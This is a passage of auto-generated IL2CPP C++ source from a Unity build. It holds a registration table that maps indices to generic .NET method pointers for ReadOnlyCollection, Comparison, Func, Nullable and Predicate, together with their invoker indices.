3868/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m4056831384_gshared*/, 1501/*1501*/}, { 4618, 3869/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m3046138769_gshared*/, 1438/*1438*/}, { 4619, 3870/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m622501365_gshared*/, 43/*43*/}, { 4620, 3871/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m2324257114_gshared*/, 86/*86*/}, { 4621, 3872/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m1557552869_gshared*/, 4/*4*/}, { 4622, 3873/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m3806843030_gshared*/, 5/*5*/}, { 4623, 3874/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m2632477376_gshared*/, 0/*0*/}, { 4624, 3875/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m927375828_gshared*/, 1/*1*/}, { 4625, 3876/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m1450905824_gshared*/, 5/*5*/}, { 4626, 3877/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m3936197025_gshared*/, 187/*187*/}, { 4627, 3878/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m3878418841_gshared*/, 90/*90*/}, { 4628, 3879/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m2372993063_gshared*/, 42/*42*/}, { 4629, 3880/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m4063596282_gshared*/, 43/*43*/}, { 4630, 3881/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m325658132_gshared*/, 4/*4*/}, { 4631, 3882/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m2892453085_gshared*/, 43/*43*/}, { 4632, 3883/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m1761907646_gshared*/, 43/*43*/}, { 4633, 3884/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m1667570241_gshared*/, 97/*97*/}, { 4634, 3885/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m1912029068_gshared*/, 187/*187*/}, { 4635, 3886/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m867570235_gshared*/, 1292/*1292*/}, { 4636, 3887/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m1652036789_gshared*/, 86/*86*/}, { 4637, 3888/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m2986037858_gshared*/, 4/*4*/}, { 4638, 3889/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m1205990061_gshared*/, 1357/*1357*/}, { 4639, 3890/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1104075286_gshared*/, 3/*3*/}, { 4640, 3891/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m1696267180_gshared*/, 1501/*1501*/}, { 4641, 3892/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m2387481411_gshared*/, 90/*90*/}, { 4642, 3893/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m3063178201_gshared*/, 1176/*1176*/}, { 4643, 3894/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m2503787861_gshared*/, 0/*0*/}, { 4644, 3895/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m395145896_gshared*/, 1248/*1248*/}, { 4645, 3896/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m356890538_gshared*/, 1293/*1293*/}, { 4646, 3897/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m3058697372_gshared*/, 42/*42*/}, { 4647, 3898/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m2319062584_gshared*/, 1247/*1247*/}, { 4648, 3899/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m1918537449_gshared*/, 1248/*1248*/}, { 4649, 3900/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m2873538493_gshared*/, 43/*43*/}, { 4650, 3901/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m1807854698_gshared*/, 86/*86*/}, { 4651, 3902/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m339327173_gshared*/, 4/*4*/}, { 4652, 3903/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m564769262_gshared*/, 5/*5*/}, { 4653, 3904/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m3127376744_gshared*/, 0/*0*/}, { 4654, 3905/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m3533985860_gshared*/, 1/*1*/}, { 4655, 3906/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m3716660032_gshared*/, 5/*5*/}, { 4656, 3907/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m2971455841_gshared*/, 187/*187*/}, { 4657, 3908/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m688362945_gshared*/, 90/*90*/}, { 4658, 3909/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m1207420111_gshared*/, 42/*42*/}, { 4659, 3910/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m628935618_gshared*/, 43/*43*/}, { 4660, 3911/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m2701391220_gshared*/, 4/*4*/}, { 4661, 3912/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m1921059509_gshared*/, 43/*43*/}, { 4662, 3913/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m3872065502_gshared*/, 43/*43*/}, { 4663, 3914/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m887129009_gshared*/, 97/*97*/}, { 4664, 3915/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m1149349508_gshared*/, 187/*187*/}, { 4665, 3916/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m61178035_gshared*/, 1293/*1293*/}, { 4666, 3917/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m154326197_gshared*/, 86/*86*/}, { 4667, 3918/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m4168861394_gshared*/, 4/*4*/}, { 4668, 3919/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m2471343701_gshared*/, 1358/*1358*/}, { 4669, 3920/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m2564472926_gshared*/, 3/*3*/}, { 4670, 3921/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m1616882548_gshared*/, 1247/*1247*/}, { 4671, 3922/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m1520759010_gshared*/, 90/*90*/}, { 4672, 3923/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m3709183314_gshared*/, 810/*810*/}, { 4673, 3924/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m3157895454_gshared*/, 0/*0*/}, { 4674, 3925/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m2811860789_gshared*/, 854/*854*/}, { 4675, 3926/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m974176789_gshared*/, 915/*915*/}, { 4676, 3927/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m3794195337_gshared*/, 42/*42*/}, { 4677, 3928/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m1581328221_gshared*/, 1146/*1146*/}, { 4678, 3929/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m1524777008_gshared*/, 854/*854*/}, { 4679, 3930/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m465108000_gshared*/, 43/*43*/}, { 4680, 3931/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m4126742951_gshared*/, 86/*86*/}, { 4681, 3932/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m1734360860_gshared*/, 4/*4*/}, { 4682, 3933/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m616574295_gshared*/, 5/*5*/}, { 4683, 3934/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m1858417639_gshared*/, 0/*0*/}, { 4684, 3935/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m2634528543_gshared*/, 1/*1*/}, { 4685, 3936/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m1302341061_gshared*/, 5/*5*/}, { 4686, 3937/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m3748573134_gshared*/, 187/*187*/}, { 4687, 3938/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m3710292720_gshared*/, 90/*90*/}, { 4688, 3939/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m1598516528_gshared*/, 42/*42*/}, { 4689, 3940/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m191878399_gshared*/, 43/*43*/}, { 4690, 3941/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m3194953447_gshared*/, 4/*4*/}, { 4691, 3942/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m4228898522_gshared*/, 43/*43*/}, { 4692, 3943/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m1358824019_gshared*/, 43/*43*/}, { 4693, 3944/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m1831743662_gshared*/, 97/*97*/}, { 4694, 3945/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m4259124821_gshared*/, 187/*187*/}, { 4695, 3946/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m1816350632_gshared*/, 915/*915*/}, { 4696, 3947/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m679313638_gshared*/, 86/*86*/}, { 4697, 3948/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m450181087_gshared*/, 4/*4*/}, { 4698, 3949/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m723866064_gshared*/, 1111/*1111*/}, { 4699, 3950/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m336636247_gshared*/, 3/*3*/}, { 4700, 3951/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m3656051313_gshared*/, 1146/*1146*/}, { 4701, 3952/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m3947957789_gshared*/, 90/*90*/}, { 4702, 3953/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m1849306263_gshared*/, 789/*789*/}, { 4703, 3954/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m2412307011_gshared*/, 0/*0*/}, { 4704, 3955/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m2409570138_gshared*/, 1252/*1252*/}, { 4705, 3956/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m3672130932_gshared*/, 916/*916*/}, { 4706, 3957/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m2749215790_gshared*/, 42/*42*/}, { 4707, 3958/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m3130422200_gshared*/, 1250/*1250*/}, { 4708, 3959/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m3663361643_gshared*/, 1252/*1252*/}, { 4709, 3960/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1151964895_gshared*/, 43/*43*/}, { 4710, 3961/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m944036076_gshared*/, 86/*86*/}, { 4711, 3962/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m1732315419_gshared*/, 4/*4*/}, { 4712, 3963/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m4058186040_gshared*/, 5/*5*/}, { 4713, 3964/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m2600246370_gshared*/, 0/*0*/}, { 4714, 3965/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m1545447998_gshared*/, 1/*1*/}, { 4715, 3966/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m3863477414_gshared*/, 5/*5*/}, { 4716, 3967/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m2651065875_gshared*/, 187/*187*/}, { 4717, 3968/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m2200089035_gshared*/, 90/*90*/}, { 4718, 3969/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m2253306805_gshared*/, 42/*42*/}, { 4719, 3970/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m1670521312_gshared*/, 43/*43*/}, { 4720, 3971/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m536709516_gshared*/, 4/*4*/}, { 4721, 3972/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m3502773339_gshared*/, 43/*43*/}, { 4722, 3973/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m632912084_gshared*/, 43/*43*/}, { 4723, 3974/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m1151103091_gshared*/, 97/*97*/}, { 4724, 3975/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m3763290810_gshared*/, 187/*187*/}, { 4725, 3976/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m3502838601_gshared*/, 916/*916*/}, { 4726, 3977/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m2404198955_gshared*/, 86/*86*/}, { 4727, 3978/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m2481390116_gshared*/, 4/*4*/}, { 4728, 3979/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m224962127_gshared*/, 1360/*1360*/}, { 4729, 3980/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1052601528_gshared*/, 3/*3*/}, { 4730, 3981/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m3778245964_gshared*/, 1250/*1250*/}, { 4731, 3982/*(Il2CppMethodPointer)&ReadOnlyCollection_1__ctor_m3868625988_gshared*/, 90/*90*/}, { 4732, 3983/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Add_m2043670000_gshared*/, 1255/*1255*/}, { 4733, 3984/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Clear_m964488020_gshared*/, 0/*0*/}, { 4734, 3985/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_Insert_m584948331_gshared*/, 844/*844*/}, { 4735, 3986/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_Remove_m315673811_gshared*/, 1295/*1295*/}, { 4736, 3987/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_RemoveAt_m1709695463_gshared*/, 42/*42*/}, { 4737, 3988/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_get_Item_m4254912039_gshared*/, 843/*843*/}, { 4738, 3989/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_IListU3CTU3E_set_Item_m338788498_gshared*/, 844/*844*/}, { 4739, 3990/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m3726550170_gshared*/, 43/*43*/}, { 4740, 3991/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_CopyTo_m504416581_gshared*/, 86/*86*/}, { 4741, 3992/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IEnumerable_GetEnumerator_m1583760158_gshared*/, 4/*4*/}, { 4742, 3993/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Add_m3775358745_gshared*/, 5/*5*/}, { 4743, 3994/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Clear_m38663429_gshared*/, 0/*0*/}, { 4744, 3995/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Contains_m4073811941_gshared*/, 1/*1*/}, { 4745, 3996/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_IndexOf_m360011399_gshared*/, 5/*5*/}, { 4746, 3997/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Insert_m571902768_gshared*/, 187/*187*/}, { 4747, 3998/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_Remove_m2507730234_gshared*/, 90/*90*/}, { 4748, 3999/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_RemoveAt_m3967262286_gshared*/, 42/*42*/}, { 4749, 4000/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_IsSynchronized_m3058846777_gshared*/, 43/*43*/}, { 4750, 4001/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_ICollection_get_SyncRoot_m2595377349_gshared*/, 4/*4*/}, { 4751, 4002/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsFixedSize_m3611810264_gshared*/, 43/*43*/}, { 4752, 4003/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_IsReadOnly_m732822989_gshared*/, 43/*43*/}, { 4753, 4004/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_get_Item_m3649741260_gshared*/, 97/*97*/}, { 4754, 4005/*(Il2CppMethodPointer)&ReadOnlyCollection_1_System_Collections_IList_set_Item_m2810776479_gshared*/, 187/*187*/}, { 4755, 4006/*(Il2CppMethodPointer)&ReadOnlyCollection_1_Contains_m3547015534_gshared*/, 1295/*1295*/}, { 4756, 4007/*(Il2CppMethodPointer)&ReadOnlyCollection_1_CopyTo_m896515972_gshared*/, 86/*86*/}, { 4757, 4008/*(Il2CppMethodPointer)&ReadOnlyCollection_1_GetEnumerator_m2144677057_gshared*/, 4/*4*/}, { 4758, 4009/*(Il2CppMethodPointer)&ReadOnlyCollection_1_IndexOf_m4025482062_gshared*/, 1361/*1361*/}, { 4759, 4010/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Count_m1778049945_gshared*/, 3/*3*/}, { 4760, 4011/*(Il2CppMethodPointer)&ReadOnlyCollection_1_get_Item_m3355831099_gshared*/, 843/*843*/}, { 4761, 4012/*(Il2CppMethodPointer)&Comparison_1__ctor_m1385856818_gshared*/, 211/*211*/}, { 4762, 4013/*(Il2CppMethodPointer)&Comparison_1_Invoke_m1638248750_gshared*/, 242/*242*/}, { 4763, 4014/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m1384288579_gshared*/, 212/*212*/}, { 4764, 4015/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m4001365168_gshared*/, 5/*5*/}, { 4765, 4016/*(Il2CppMethodPointer)&Comparison_1__ctor_m3745606970_gshared*/, 211/*211*/}, { 4766, 4017/*(Il2CppMethodPointer)&Comparison_1_Invoke_m64450954_gshared*/, 1543/*1543*/}, { 4767, 4018/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m2863910783_gshared*/, 1609/*1609*/}, { 4768, 4019/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m596328912_gshared*/, 5/*5*/}, { 4769, 4020/*(Il2CppMethodPointer)&Comparison_1__ctor_m4259527427_gshared*/, 211/*211*/}, { 4770, 4021/*(Il2CppMethodPointer)&Comparison_1_Invoke_m1513132985_gshared*/, 1544/*1544*/}, { 4771, 4022/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m1549337842_gshared*/, 1610/*1610*/}, { 4772, 4023/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m179917407_gshared*/, 5/*5*/}, { 4773, 4024/*(Il2CppMethodPointer)&Comparison_1__ctor_m2942822710_gshared*/, 211/*211*/}, { 4774, 4025/*(Il2CppMethodPointer)&Comparison_1_Invoke_m4190993814_gshared*/, 1545/*1545*/}, { 4775, 4026/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m3266062717_gshared*/, 1611/*1611*/}, { 4776, 4027/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m2033936832_gshared*/, 5/*5*/}, { 4777, 4028/*(Il2CppMethodPointer)&Comparison_1_Invoke_m345024424_gshared*/, 1060/*1060*/}, { 4778, 4029/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m2263530995_gshared*/, 1612/*1612*/}, { 4779, 4030/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m4098579094_gshared*/, 5/*5*/}, { 4780, 4031/*(Il2CppMethodPointer)&Comparison_1_Invoke_m1670081898_gshared*/, 1077/*1077*/}, { 4781, 4032/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m2330243615_gshared*/, 1613/*1613*/}, { 4782, 4033/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m3762228136_gshared*/, 5/*5*/}, { 4783, 4034/*(Il2CppMethodPointer)&Comparison_1__ctor_m3767256160_gshared*/, 211/*211*/}, { 4784, 4035/*(Il2CppMethodPointer)&Comparison_1_Invoke_m2645957248_gshared*/, 1546/*1546*/}, { 4785, 4036/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m2910474027_gshared*/, 1614/*1614*/}, { 4786, 4037/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m4170692898_gshared*/, 5/*5*/}, { 4787, 4038/*(Il2CppMethodPointer)&Comparison_1__ctor_m1832890678_gshared*/, 211/*211*/}, { 4788, 4039/*(Il2CppMethodPointer)&Comparison_1_Invoke_m353639462_gshared*/, 1547/*1547*/}, { 4789, 4040/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m4142385273_gshared*/, 1615/*1615*/}, { 4790, 4041/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m4174686984_gshared*/, 5/*5*/}, { 4791, 4042/*(Il2CppMethodPointer)&Comparison_1__ctor_m852795630_gshared*/, 211/*211*/}, { 4792, 4043/*(Il2CppMethodPointer)&Comparison_1_Invoke_m897835902_gshared*/, 1548/*1548*/}, { 4793, 4044/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m4224593217_gshared*/, 1616/*1616*/}, { 4794, 4045/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m1074531304_gshared*/, 5/*5*/}, { 4795, 4046/*(Il2CppMethodPointer)&Comparison_1__ctor_m883164393_gshared*/, 211/*211*/}, { 4796, 4047/*(Il2CppMethodPointer)&Comparison_1_Invoke_m2664841287_gshared*/, 1549/*1549*/}, { 4797, 4048/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m4030535530_gshared*/, 1617/*1617*/}, { 4798, 4049/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m153558673_gshared*/, 5/*5*/}, { 4799, 4050/*(Il2CppMethodPointer)&Comparison_1__ctor_m3438229060_gshared*/, 211/*211*/}, { 4800, 4051/*(Il2CppMethodPointer)&Comparison_1_Invoke_m4047872872_gshared*/, 1550/*1550*/}, { 4801, 4052/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m1103040431_gshared*/, 1618/*1618*/}, { 4802, 4053/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m2678763282_gshared*/, 5/*5*/}, { 4803, 4054/*(Il2CppMethodPointer)&Comparison_1__ctor_m2159122699_gshared*/, 211/*211*/}, { 4804, 4055/*(Il2CppMethodPointer)&Comparison_1_Invoke_m1081247749_gshared*/, 1551/*1551*/}, { 4805, 4056/*(Il2CppMethodPointer)&Comparison_1_BeginInvoke_m4056757384_gshared*/, 1619/*1619*/}, { 4806, 4057/*(Il2CppMethodPointer)&Comparison_1_EndInvoke_m3572773391_gshared*/, 5/*5*/}, { 4807, 614/*(Il2CppMethodPointer)&Func_2__ctor_m1354888807_gshared*/, 211/*211*/}, { 4808, 635/*(Il2CppMethodPointer)&Func_2_Invoke_m2929712329_gshared*/, 1/*1*/}, { 4809, 4058/*(Il2CppMethodPointer)&Func_2_BeginInvoke_m1429757044_gshared*/, 113/*113*/}, { 4810, 4059/*(Il2CppMethodPointer)&Func_2_EndInvoke_m924416567_gshared*/, 1/*1*/}, { 4811, 698/*(Il2CppMethodPointer)&Func_2__ctor_m1874497973_gshared*/, 211/*211*/}, { 4812, 699/*(Il2CppMethodPointer)&Func_2_Invoke_m4121137703_gshared*/, 20/*20*/}, { 4813, 4060/*(Il2CppMethodPointer)&Func_2_BeginInvoke_m669892004_gshared*/, 113/*113*/}, { 4814, 4061/*(Il2CppMethodPointer)&Func_2_EndInvoke_m971580865_gshared*/, 20/*20*/}, { 4815, 4062/*(Il2CppMethodPointer)&Func_3__ctor_m781027_gshared*/, 211/*211*/}, { 4816, 4063/*(Il2CppMethodPointer)&Func_3_BeginInvoke_m3279990807_gshared*/, 1620/*1620*/}, { 4817, 4064/*(Il2CppMethodPointer)&Func_3_EndInvoke_m1682379731_gshared*/, 1/*1*/}, { 4818, 4065/*(Il2CppMethodPointer)&Nullable_1_Equals_m3860982732_AdjustorThunk*/, 1/*1*/}, { 4819, 4066/*(Il2CppMethodPointer)&Nullable_1_Equals_m1889119397_AdjustorThunk*/, 1621/*1621*/}, { 4820, 4067/*(Il2CppMethodPointer)&Nullable_1_GetHashCode_m1791015856_AdjustorThunk*/, 3/*3*/}, { 4821, 4068/*(Il2CppMethodPointer)&Nullable_1_ToString_m1238126148_AdjustorThunk*/, 4/*4*/}, { 4822, 4069/*(Il2CppMethodPointer)&Predicate_1__ctor_m2826800414_gshared*/, 211/*211*/}, { 4823, 4070/*(Il2CppMethodPointer)&Predicate_1_Invoke_m695569038_gshared*/, 25/*25*/}, { 4824, 4071/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m2559992383_gshared*/, 960/*960*/}, { 4825, 4072/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m1202813828_gshared*/, 1/*1*/}, { 4826, 4073/*(Il2CppMethodPointer)&Predicate_1__ctor_m1767993638_gshared*/, 211/*211*/}, { 4827, 4074/*(Il2CppMethodPointer)&Predicate_1_Invoke_m527131606_gshared*/, 1268/*1268*/}, { 4828, 4075/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m1448216027_gshared*/, 1622/*1622*/}, { 4829, 4076/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m215026240_gshared*/, 1/*1*/}, { 4830, 4077/*(Il2CppMethodPointer)&Predicate_1__ctor_m1292402863_gshared*/, 211/*211*/}, { 4831, 4078/*(Il2CppMethodPointer)&Predicate_1_Invoke_m2060780095_gshared*/, 1269/*1269*/}, { 4832, 4079/*(Il2CppMethodPointer)&Predicate_1_BeginInvoke_m1856151290_gshared*/, 1623/*1623*/}, { 4833, 4080/*(Il2CppMethodPointer)&Predicate_1_EndInvoke_m259774785_gshared*/, 1/*1*/}, { 4834, 4081/*(Il2CppMethodPointer)&Predicate_1__ctor_m3811123782_gshared*/, 